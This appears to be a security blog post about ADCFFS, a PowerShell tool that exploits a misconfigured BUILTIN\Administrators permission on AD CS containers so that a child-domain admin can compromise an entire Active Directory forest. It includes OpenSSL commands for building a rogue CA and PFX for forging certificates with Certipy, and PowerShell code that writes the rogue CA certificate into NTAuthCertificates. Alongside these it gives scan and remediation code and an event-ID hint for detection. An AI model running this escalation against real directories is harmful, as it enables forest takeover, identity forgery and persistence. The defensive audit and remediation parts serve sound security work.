
AD-CS-Forest-Exploiter : Mastering Security Through PowerShell For AD CS Misconfiguration

ADCFFS is a PowerShell script that exploits a permission misconfiguration on the AD CS containers in the forest's Configuration partition. Because the misconfigured ACE is granted to BUILTIN\Administrators, whose SID is the same in every domain, an administrator of any child domain can write to those containers, giving privilege escalation and persistence from any child domain up to full forest compromise.

The tool can also be used first to scan the forest to determine whether it is vulnerable to the attack, and it can remedy the permission misconfiguration as well. More information on the exploit can be found in the accompanying whitepaper.

Requirements

Modules

The script relies on the Active Directory PowerShell module from Microsoft's Remote Server Administration Tools (RSAT). On Windows 10/11 it can be installed from an elevated prompt with the following command:

Add-WindowsCapability -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 -Online

Permissions

To determine whether the forest is vulnerable, only low-privileged AD access is required, since reading the container ACLs needs no special rights. To exploit the misconfiguration, however, your AD user must be a member of the Administrators group (BUILTIN\Administrators) of a child domain in the forest.

Certificate Authority

In order to embed a rogue CA, you first have to generate the CA key pair and a self-signed CA certificate. This can be done using OpenSSL and the following commands (comments added for orientation):

openssl genrsa -out fakeca.key 2048                                    # CA private key (unencrypted, see -nodes below)
openssl req -x509 -new -nodes -key fakeca.key -sha256 -days 1024 -out fakeca.crt   # self-signed CA certificate, PEM
openssl x509 -outform der -in fakeca.crt -out fakeca.der               # DER copy; this is what gets written into AD
cat fakeca.key > fakeca.pem
cat fakeca.crt >> fakeca.pem                                           # key and certificate in one PEM file
openssl pkcs12 -in fakeca.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out fakeca.pfx   # PFX for Certipy / Windows tooling

The fakeca.der file should be copied to the Windows host from which ADCFFS will be executed. The fakeca.pfx file (the rogue CA's key and certificate) can be used with tooling such as Certipy to forge certificates for principals in the forest once the CA is trusted.

Usage

The functions of ADCFFS are loaded into PowerShell with the Import-Module command. In total, there are three functions:

ScanContainerPermissions

The ScanContainerPermissions function connects to ADSI and reads the ACLs of the containers created during AD CS installation. If an explicit permission for BUILTIN\Administrators is found on them, the forest is reported as vulnerable to the attack.

RemedyContainerPermissions

The RemedyContainerPermissions function connects to ADSI and removes the BUILTIN\Administrators permission from all AD CS containers, thus removing the installation misconfiguration. Writing the Configuration partition requires forest-root (Enterprise Admin level) rights, so run the remediation from an appropriately privileged session.
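The following is an added example, not code from ADCFFS, showing what the scan and remedy steps above amount to with the RSAT ActiveDirectory module: enumerate the AD CS containers under CN=Public Key Services in the Configuration partition, list every explicit ACE whose trustee is BUILTIN\Administrators (S-1-5-32-544), and optionally strip those ACEs. The function and variable names are my own; the container list is the Public Key Services container and its direct children, which is an assumption about which containers the installer touches.

```powershell
# Added example (not part of ADCFFS): scan the AD CS containers in the Configuration
# partition for explicit ACEs granted to BUILTIN\Administrators, and optionally remove them.
# Requires the RSAT ActiveDirectory module; function and variable names are my own.
Import-Module ActiveDirectory

# BUILTIN\Administrators has the same well-known SID in every domain, so an ACE for it
# on a forest-wide container also matches the Administrators group of every child domain.
$BuiltinAdminsSid = [System.Security.Principal.SecurityIdentifier]'S-1-5-32-544'

function Get-AdcsContainer {
    # CN=Public Key Services and its direct children (NTAuthCertificates,
    # Certification Authorities, Enrollment Services, Certificate Templates, AIA, CDP, ...).
    # Assumption: these are the containers the AD CS installer configures.
    $cfg = (Get-ADRootDSE).configurationNamingContext
    $pks = "CN=Public Key Services,CN=Services,$cfg"
    @(Get-ADObject -Identity $pks) +
    @(Get-ADObject -SearchBase $pks -SearchScope OneLevel -Filter *)
}

function Get-ExplicitBuiltinAdminAce {
    param([System.DirectoryServices.ActiveDirectorySecurity]$Acl)
    # Explicit (non-inherited) ACEs whose trustee resolves to S-1-5-32-544.
    $Acl.Access | Where-Object {
        -not $_.IsInherited -and
        $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) -eq $BuiltinAdminsSid
    }
}

function Test-AdcsContainerPermissions {
    # One result row per offending ACE; no rows means the misconfiguration was not found.
    # Only read access is needed, so this runs as a low-privileged forest user.
    foreach ($obj in Get-AdcsContainer) {
        $acl = Get-Acl -Path "AD:\$($obj.DistinguishedName)"
        foreach ($ace in Get-ExplicitBuiltinAdminAce -Acl $acl) {
            [pscustomobject]@{
                Container = $obj.DistinguishedName
                Rights    = $ace.ActiveDirectoryRights
                Type      = $ace.AccessControlType
            }
        }
    }
}

function Remove-AdcsBuiltinAdminAce {
    # Strips the explicit BUILTIN\Administrators ACEs. Supports -WhatIf so the change can
    # be reviewed first; run it from a forest-root (Enterprise Admin level) session.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    foreach ($obj in Get-AdcsContainer) {
        $path = "AD:\$($obj.DistinguishedName)"
        $acl  = Get-Acl -Path $path
        $aces = @(Get-ExplicitBuiltinAdminAce -Acl $acl)
        if ($aces.Count -eq 0) { continue }
        foreach ($ace in $aces) { [void]$acl.RemoveAccessRule($ace) }
        if ($PSCmdlet.ShouldProcess($obj.DistinguishedName, 'Remove BUILTIN\Administrators ACE(s)')) {
            Set-Acl -Path $path -AclObject $acl
        }
    }
}

# Usage:
#   Test-AdcsContainerPermissions | Format-Table -AutoSize
#   Remove-AdcsBuiltinAdminAce -WhatIf     # preview, then run again without -WhatIf
```

Inherited ACEs are deliberately skipped: the misconfiguration is the explicit entry the installer writes, and RemoveAccessRule would not affect inherited entries anyway. Because the Configuration partition is replicated forest-wide, the remediation can be written through any domain controller, but the caller's token must carry forest-root administrative rights for Set-Acl to succeed.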

AddCertificateTrusts

The AddCertificateTrusts function exploits the misconfiguration by embedding the certificate of a rogue CA into both the NTAuthCertificates object and the first writable CertificateAuthority object it finds under the AD CS containers.

Once domain controllers have refreshed their local copy of the NTAuth store, which happens on the next Group Policy (autoenrollment) refresh, the rogue CA is trusted as a CA that is allowed to issue certificates for authentication, so certificates it forges for any principal in the forest are accepted.
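As an added example that is not ADCFFS's own code, this shows the NTAuthCertificates half of the step just described with the RSAT ActiveDirectory module: append the DER-encoded rogue CA certificate to the multi-valued cACertificate attribute, read it back to confirm the write, and remove exactly that value again for cleanup. It assumes the fakeca.der produced by the OpenSSL steps above and a session whose token carries the child-domain BUILTIN\Administrators membership that the misconfigured ACE grants write access to; the function names are my own, and the write to the CertificateAuthority object that the tool also performs is not shown.

```powershell
# Added example (not ADCFFS's own code): publish a rogue CA certificate into the
# NTAuthCertificates object, verify it, and clean it up. Assumes fakeca.der from the
# OpenSSL steps above and a session holding child-domain BUILTIN\Administrators
# membership that matches the misconfigured ACE. Function names are my own.
Import-Module ActiveDirectory

function Get-NtAuthDn {
    # NTAuthCertificates lives in the Configuration NC, so any DC in the forest will do.
    $cfg = (Get-ADRootDSE).configurationNamingContext
    "CN=NTAuthCertificates,CN=Public Key Services,CN=Services,$cfg"
}

function Add-RogueCaToNtAuth {
    param([Parameter(Mandatory)][string]$DerPath)
    $cert = [System.Security.Cryptography.X509Certificates.X509Certificate2]::new($DerPath)
    # cACertificate is multi-valued; -Add appends without touching the legitimate CA entries.
    Set-ADObject -Identity (Get-NtAuthDn) -Add @{ cACertificate = [byte[]]$cert.RawData }
    $cert.Thumbprint
}

function Test-NtAuthContainsCert {
    # Reads the attribute back from AD and returns $true if a certificate with the given
    # SHA-1 thumbprint is present. Useful both to confirm the write and to audit later.
    param([Parameter(Mandatory)][string]$Thumbprint)
    $obj = Get-ADObject -Identity (Get-NtAuthDn) -Properties cACertificate
    foreach ($raw in $obj.cACertificate) {
        $c = [System.Security.Cryptography.X509Certificates.X509Certificate2]::new([byte[]]$raw)
        if ($c.Thumbprint -eq $Thumbprint) { return $true }
    }
    return $false
}

function Remove-RogueCaFromNtAuth {
    # Cleanup: remove exactly the value that was added, leaving other CA entries intact.
    param([Parameter(Mandatory)][string]$DerPath)
    $cert = [System.Security.Cryptography.X509Certificates.X509Certificate2]::new($DerPath)
    Set-ADObject -Identity (Get-NtAuthDn) -Remove @{ cACertificate = [byte[]]$cert.RawData }
}

# Usage (from the Windows host holding fakeca.der):
#   $tp = Add-RogueCaToNtAuth -DerPath .\fakeca.der
#   Test-NtAuthContainsCert -Thumbprint $tp      # $true once the write has replicated
#   Remove-RogueCaFromNtAuth -DerPath .\fakeca.der
```

The LDAP write takes effect for authentication only after domain controllers refresh their local NTAuth store, so on a lab DC a gpupdate /force shortens the wait. The same Test-NtAuthContainsCert loop, run against the thumbprints of the legitimate CAs, is a cheap defensive audit: any cACertificate value on NTAuthCertificates that is not an expected enterprise CA is a finding, and with object auditing enabled on that container, the modification itself is logged as a Directory Service Changes event (ID 5136).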

Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.
